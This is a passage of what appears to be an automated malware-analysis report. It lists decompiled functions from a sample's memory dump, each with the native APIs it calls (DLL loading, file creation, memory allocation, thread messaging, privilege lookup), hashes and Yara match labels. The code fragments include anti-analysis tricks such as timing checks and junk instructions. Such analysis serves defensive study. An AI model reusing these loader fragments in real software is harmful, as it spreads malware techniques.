				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;
				void* _t33;

				_t30 = __esi;
				_v8 =  &_v536;
				_t15 = E0041AB50( &_v12, 0x104, _a8);
				_t32 = _t31 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041AF70(__eflags, _v8);
					_t33 = _t32 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B1F0( &_v12, 0);
						_t33 = _t33 + 8;
					}
					_t18 = E00419300(_v8, _t30, _v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x00409b20
0x00409b3c
0x00409b3f
0x00409b44
0x00409b49
0x00409b53
0x00409b58
0x00409b5b
0x00409b5d
0x00409b65
0x00409b6a
0x00409b6a
0x00409b71
0x00409b79
0x00409b7c
0x00409b7e
0x00409b92
0x00000000
0x00409b94
0x00409b9a
0x00409b4e
0x00409b4e
0x00409b4e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92

Memory Dump Source

Source File: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: f6872c6640a97d379917802917a35d8835196bd2b620e753e6f67e56f73dccdd
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: EC0100B5D0010DBBDB10DAA5EC42FDEB778AB54318F0041A9A908A7281F635EA54C795

Uniqueness

Uniqueness Score: -1.00%

Function 004181BA, Relevance: 1.5, APIs: 1, Instructions: 42
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E004181BA(signed int __edx, void* __edi, intOrPtr _a8, HANDLE* _a12, long _a16, struct _EXCEPTION_RECORD _a20, struct _ERESOURCE_LITE _a24, struct _GUID _a28, long _a32, long _a36, long _a40, long _a44, void* _a48, long _a52) {
				long _t23;

				asm("cmc");
				_pop(es);
				 *(__edi - 0x74aaaf27) =  *(__edi - 0x74aaaf27) & __edx;
				_t17 = _a8;
				_t5 = _t17 + 0xc40; // 0xc40
				E00418DC0(__edi, _a8, _t5,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x28);
				_t23 = NtCreateFile(_a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48, _a52); // executed
				return _t23;
			}

0x004181ba
0x004181bb
0x004181bc
0x004181c3
0x004181cf
0x004181d7
0x0041820d
0x00418211

APIs

NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D

Memory Dump Source

Source File: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 07cf217adffd9633c745143b4c7f8ef1a53b4cf4062fd4fa2e62ed320b606292
Instruction ID: 95386694f157c4031244ce239ecc74ebf79225e873ed69a6a1d60e556a5e4718
Opcode Fuzzy Hash: 07cf217adffd9633c745143b4c7f8ef1a53b4cf4062fd4fa2e62ed320b606292
Instruction Fuzzy Hash: 9C01B6B2245108AFCB08CF99DC94DEB77A9AF8C354F15825CFA0DD7241C630E951CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004181C0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004181C0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E00418DC0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x004181cf
0x004181d7
0x0041820d
0x00418211

APIs

NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D

Memory Dump Source

Source File: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 76db84dd9462a71377061bd321799a59568980bd09e0245c51acac76316ecf65
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: 52F0B6B2200208ABCB08CF89DC85DEB77ADAF8C754F158248FA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004183A0, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004183A0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E00418DC0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x004183af
0x004183b7
0x004183d9
0x004183dd

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9

Memory Dump Source

Source File: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: ed05b43336be2385218ce2c210938f1a749d46cd8ec257da0df7421e0e4bafff
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: BCF015B2200208ABCB14DF89DC81EEB77ADAF88754F118549FE0897241CA30F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004182F0, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004182F0(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409743
				E00418DC0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x004182f3
0x004182f6
0x004182ff
0x00418307
0x00418315
0x00418319

APIs

NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315

Memory Dump Source

Source File: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: fa02b1b0b4c248d7afc65a810b6911db7169f724aa7cfa6c67706bd771296af7
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: F5D01776200314ABD710EF99DC85EE77BACEF48760F154499BA189B282CA30FA0086E0

Uniqueness

Uniqueness Score: -1.00%

Function 05409540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0540954A

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 193927013ac27ab2ed9f1a0862f74c538c9a59b96366432828154660cac96ecd
Instruction ID: 0327c14727fa8e61f8da0b2196c574189955ab272e83bc04cf72d43ee9d4a1fe
Opcode Fuzzy Hash: 193927013ac27ab2ed9f1a0862f74c538c9a59b96366432828154660cac96ecd
Instruction Fuzzy Hash: 7B9002B5711010030105A5590744547046697D5391391C422F5005550CE76188616165

Uniqueness

Uniqueness Score: -1.00%

Function 054095D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 054095DA

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2e3669ef8a336e8967361c76be1660755ac4f2aa860a58742a44750d3e01dee8
Instruction ID: 76396fb075b61bd972155c41ce842a36c44f1b94e1cee6fbb23df43ce9b1c19d
Opcode Fuzzy Hash: 2e3669ef8a336e8967361c76be1660755ac4f2aa860a58742a44750d3e01dee8
Instruction Fuzzy Hash: EF9002F170201003410571594454656442A97E0241B91C422E5004590DD66588917169

Uniqueness

Uniqueness Score: -1.00%

Function 05409710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0540971A

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8dca5d373f9c6751ad633d8b6a0ef6390023d6fdebd29cb84eb75736b165a9d2
Instruction ID: 3e2fa24e79f4d48c853883245d5c24938cabfc69adf191acf5e1bfd56d706e0d
Opcode Fuzzy Hash: 8dca5d373f9c6751ad633d8b6a0ef6390023d6fdebd29cb84eb75736b165a9d2
Instruction Fuzzy Hash: 9F9002B170101402D10065995448686042597E0341F91D412A9014555ED7A588917175

Uniqueness

Uniqueness Score: -1.00%

Function 05409FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05409FEA

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a32aa3b600f840873678354700e79493c83525b8bbbc4e5e3f6805a4b225b2f0
Instruction ID: 8566066cb51a4dbfe373bf63fe1d97c2a503279ef90e2f323001eeb5e5c7b946
Opcode Fuzzy Hash: a32aa3b600f840873678354700e79493c83525b8bbbc4e5e3f6805a4b225b2f0
Instruction Fuzzy Hash: 529002B171115402D11061598444746042597D1241F91C812A4814558D97D588917166

Uniqueness

Uniqueness Score: -1.00%

Function 05409780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0540978A

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a824230f60d586ca7c31fd61a0cf2b7219e38a655d0a66642ed20dee2b15b91a
Instruction ID: 23828140ae5370c9b8945a9a46444c4c4159af5164b1160ec04b06e3073e241d
Opcode Fuzzy Hash: a824230f60d586ca7c31fd61a0cf2b7219e38a655d0a66642ed20dee2b15b91a
Instruction Fuzzy Hash: 689002B971301002D1807159544864A042597D1242FD1D816A4005558CDA5588696365

Uniqueness

Uniqueness Score: -1.00%

Function 054097A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 054097AA

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0367049e903d41e5d505680ab1af6d05f330d687463270f6a22988907a94507f
Instruction ID: 42d608c414aefb32412dafced0c500fdabc837033484a8bf5702b98696f54e16
Opcode Fuzzy Hash: 0367049e903d41e5d505680ab1af6d05f330d687463270f6a22988907a94507f
Instruction Fuzzy Hash: E49002B170101003D140715954586464425E7E1341F91D412E4404554CEA5588566266

Uniqueness

Uniqueness Score: -1.00%

Function 05409660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0540966A

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6e59f1cdc393a714e1230e8e5fbb1139521c014b07fa59d92f19ec33afd47ecf
Instruction ID: 59f1663bb1dfb74b7df078880b81278f1d8c5a96967d5b63919248b2d63b47a7
Opcode Fuzzy Hash: 6e59f1cdc393a714e1230e8e5fbb1139521c014b07fa59d92f19ec33afd47ecf
Instruction Fuzzy Hash: 7C9002B170101802D1807159444468A042597D1341FD1C416A4015654DDB558A5977E5

Uniqueness

Uniqueness Score: -1.00%

Function 054096E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 054096EA

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: addf19ccbc7cc83ce96bce22c544b80a326722512ee02553c8c23c46837b691f
Instruction ID: 30785cceaa46bb4168fb12bbf7401f561d7658e25ef7d3d7c6e852f27c984b1d
Opcode Fuzzy Hash: addf19ccbc7cc83ce96bce22c544b80a326722512ee02553c8c23c46837b691f
Instruction Fuzzy Hash: FA9002B170109802D1106159844478A042597D0341F95C812A8414658D97D588917165

Uniqueness

Uniqueness Score: -1.00%

Function 05409910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0540991A

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dce10951b56cc6af871c0b7f483b950c8c21b5bba5ee1f249a400fb138e56d30
Instruction ID: 301a5785f0592591a8dac0971c44d1e36c3dd41320d3c86797d7094e893f1e61
Opcode Fuzzy Hash: dce10951b56cc6af871c0b7f483b950c8c21b5bba5ee1f249a400fb138e56d30
Instruction Fuzzy Hash: 3D9002F170101402D14071594444786042597D0341F91C412A9054554E97998DD576A9

Uniqueness

Uniqueness Score: -1.00%

Function 054099A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 054099AA

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 72958b82769ca62830501916fd19e11ed9171ab124e2d40a65005aae54189751
Instruction ID: e177a82e148f44ec1ae9d4d62d5b24925c6761682cb3962d508ab820e1d4d7e5
Opcode Fuzzy Hash: 72958b82769ca62830501916fd19e11ed9171ab124e2d40a65005aae54189751
Instruction Fuzzy Hash: 2B9002F174101442D10061594454B460425D7E1341F91C416E5054554D9759CC52716A

Uniqueness

Uniqueness Score: -1.00%

Function 05409840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0540984A

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b25aed41e074ef2283aa04ec1d61f30be8376e8ef70e6e72f7667c0b96502d34
Instruction ID: f3e861711dffb95ddbb60a35343f37317472b26fe0fd9ab9a1461672d411119b
Opcode Fuzzy Hash: b25aed41e074ef2283aa04ec1d61f30be8376e8ef70e6e72f7667c0b96502d34
Instruction Fuzzy Hash: DC9002B1742051525545B15944445474426A7E02817D1C413A5404950C96669856E665

Uniqueness

Uniqueness Score: -1.00%

Function 05409860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0540986A

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5988148c01c677aedb2b1ddb7f98d38b6f6a47ea81b576035ab7debd1c8087a3
Instruction ID: 0096f0d135235246fdff043645133716a058c771b2717ca58da0f2f562d58f6d
Opcode Fuzzy Hash: 5988148c01c677aedb2b1ddb7f98d38b6f6a47ea81b576035ab7debd1c8087a3
Instruction Fuzzy Hash: 709002B170101413D11161594544747042997D0281FD1C813A4414558DA7968952B165

Uniqueness

Uniqueness Score: -1.00%

Function 054098F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 054098FA

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 38f0f2e85f5b3d7a7691e873c2349d4e825da303aa6430fd27bd41d233c2c564
Instruction ID: 9fe3c1a97959a3e0440f29dbe8ef82c0316d121c1d9101a76bbcba758aeed8f2
Opcode Fuzzy Hash: 38f0f2e85f5b3d7a7691e873c2349d4e825da303aa6430fd27bd41d233c2c564
Instruction Fuzzy Hash: 8B9002B1B0101502D10171594444656042A97D0281FD1C423A5014555EDB658992B175

Uniqueness

Uniqueness Score: -1.00%

Function 05409A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05409A5A

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 49e1c006d5221468dc6fed92a73dd6aaf6277c2fc7ae5066da752a41f22ce0ab
Instruction ID: 902735933698dafa902a073b4b86b7c8cb732b10fd956bba2f32468abda45f9f
Opcode Fuzzy Hash: 49e1c006d5221468dc6fed92a73dd6aaf6277c2fc7ae5066da752a41f22ce0ab
Instruction Fuzzy Hash: CF9002B171181042D20065694C54B47042597D0343F91C516A4144554CDA5588616565

Uniqueness

Uniqueness Score: -1.00%

Function 05409A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05409A0A

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 259be9dc51364700bcb738f3b40af70521e825d0754defd2fa2f7e6ed7a809fd
Instruction ID: 57dc186a3cc0494fde6131b601fc359040378282625e18ef491b7a844fb8baa2
Opcode Fuzzy Hash: 259be9dc51364700bcb738f3b40af70521e825d0754defd2fa2f7e6ed7a809fd
Instruction Fuzzy Hash: 189002B170141402D1006159485474B042597D0342F91C412A5154555D9765885175B5

Uniqueness

Uniqueness Score: -1.00%

Function 05409A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05409A2A

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 15a77a9347cfff9dcf8b1ed9f4f85115a7acd5a47d8db7ea5bddb3662bf38a45
Instruction ID: ae081fd757f482157706d9f6e7d85e113e50ae67fdabc2492505e36d016a6cf0
Opcode Fuzzy Hash: 15a77a9347cfff9dcf8b1ed9f4f85115a7acd5a47d8db7ea5bddb3662bf38a45
Instruction Fuzzy Hash: 809002B1B01010424140716988849464425BBE1251791C522A4988550D9699886566A9

Uniqueness

Uniqueness Score: -1.00%

Function 004088B0, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E004088B0(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E00(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407010( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E00419CD0( &_v284, 0x104);
						E0041A340( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413DD0(E00413D70(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe1a5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407040( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004070C0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}

0x004088bb
0x004088c3
0x004088c5
0x004088ca
0x004088cf
0x004088e2
0x004088e7
0x004088f0
0x004088fc
0x0040890f
0x00408914
0x00408917
0x00408920
0x00408932
0x00408937
0x0040893c
0x00000000
0x00000000
0x0040893e
0x00408942
0x00000000
0x00000000
0x00408944
0x00000000
0x00408942
0x00408946
0x00408949
0x0040894f
0x00408951
0x0040895c
0x00408961
0x00408964
0x00408971
0x0040897c
0x0040897e
0x00408984
0x00408988
0x0040898b
0x0040898b
0x00408992
0x00408995
0x0040899a
0x004089a7
0x004088d6
0x004088d6
0x004088d6

Memory Dump Source

Source File: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
Instruction ID: aa626ceb7ef0a3bcdbf1efb1d9dc2f5a7bb3811b4857f0e914c6161f28eec10c
Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
Instruction Fuzzy Hash: FE213AB3D402085BDB10E6649D42BFF73AC9B50304F44057FF989A3182F638BB4987A6

Uniqueness

Uniqueness Score: -1.00%

Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E00407260(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* __esi;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				void* _t24;
				intOrPtr* _t25;
				void* _t26;

				_v68 = 0;
				E00419D20( &_v67, 0, 0x3f);
				E0041A900( &_v68, 3);
				_t24 = _a4 + 0x1c;
				_t12 = E00409B20(_t24, _t24, _t24,  &_v68); // executed
				_push(0xc4e7b6d6);
				asm("les ebp, [edx]");
				_push(0);
				_push(_t12);
				_push(_t24);
				_t13 = E00413E30();
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t33 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409280(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x0040726f
0x00407273
0x0040727e
0x0040728a
0x0040728e
0x00407293
0x00407297
0x0040729a
0x0040729c
0x0040729d
0x0040729e
0x004072a3
0x004072aa
0x004072ad
0x004072ba
0x004072bc
0x004072be
0x004072db
0x004072db
0x00000000
0x004072dd
0x004072e2

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA

Memory Dump Source

Source File: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
Instruction ID: bbcd0b2e5740072d15388175686a93538b06234ac68ffc2b081785cbfc84dfa6
Opcode Fuzzy Hash: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
Instruction Fuzzy Hash: 2B01D431A8022876E720A6959C03FFF772C9B00B54F05405EFF04BA1C2E6A87D0682EA

Uniqueness

Uniqueness Score: -1.00%

Function 0040723E, Relevance: 1.5, APIs: 1, Instructions: 44
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040723E(void* __eax, void* __eflags) {
				void* _t8;
				void* _t25;
				void* _t26;

				_t8 = _t25;
				_t26 = __eax;
				if (__eflags >= 0) goto L3;
			}

0x0040723e
0x0040723e
0x0040723f

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA

Memory Dump Source

Source File: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: bc9aae5733f036cec25fee006b7889dbe007ff606c19b08c95ce615c2248c978
Instruction ID: f817942838aa98f78ee71bf382ac81ba22314526547a8f3c787aad8cfcabd46b
Opcode Fuzzy Hash: bc9aae5733f036cec25fee006b7889dbe007ff606c19b08c95ce615c2248c978
Instruction Fuzzy Hash: 98F0BB72A4021476E71165A16C03FFE73585B40B15F5901BFFE04FA2C2E6A9AD4982EA

Uniqueness

Uniqueness Score: -1.00%

Function 00418621, Relevance: 1.5, APIs: 1, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00418621(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __esi, void* _a1, void* _a4, void* _a12, void* _a16, void* _a20) {
				signed int _t12;
				void* _t20;

				_t20 = __ecx;
				asm("bound esp, [0x85897367]");
				_t12 = __eax + 0x000000a0 ^ 0xb6d86629;
				asm("outsb");
				if (_t12 >= 0) goto L5;
			}

0x00418621
0x00418621
0x00418629
0x0041862e
0x0041862f

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660

Memory Dump Source

Source File: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 752cd76c7982f7b837b93836cc24d229ee51082f8be458ce0aabe0e4ac85d208
Instruction ID: 96a59f168e0f1e5260d26ab7054fe02fb9104156bff85740ab5d6f270c2fbc78
Opcode Fuzzy Hash: 752cd76c7982f7b837b93836cc24d229ee51082f8be458ce0aabe0e4ac85d208
Instruction Fuzzy Hash: 71F03CB5600244AFDB10EF55DC86DE73768EF86214F01845AFD0897342DA34E92187F5

Uniqueness

Uniqueness Score: -1.00%

Function 00418667, Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660

Memory Dump Source

Source File: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6f447e861e881f92d05723ca3977fb4f06a1a085c84121b1c5ae6a5b7527a7aa
Instruction ID: 8d0b5bc25070b885f79608bbff85c8a4301d52a9a2e8648809ae1bda88f98841
Opcode Fuzzy Hash: 6f447e861e881f92d05723ca3977fb4f06a1a085c84121b1c5ae6a5b7527a7aa
Instruction Fuzzy Hash: 13F027B11082406FE714EFA0DD89EE77B68DF85364F2409AEECCC5B106C535A415CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 004185D6, Relevance: 1.5, APIs: 1, Instructions: 28COMMON

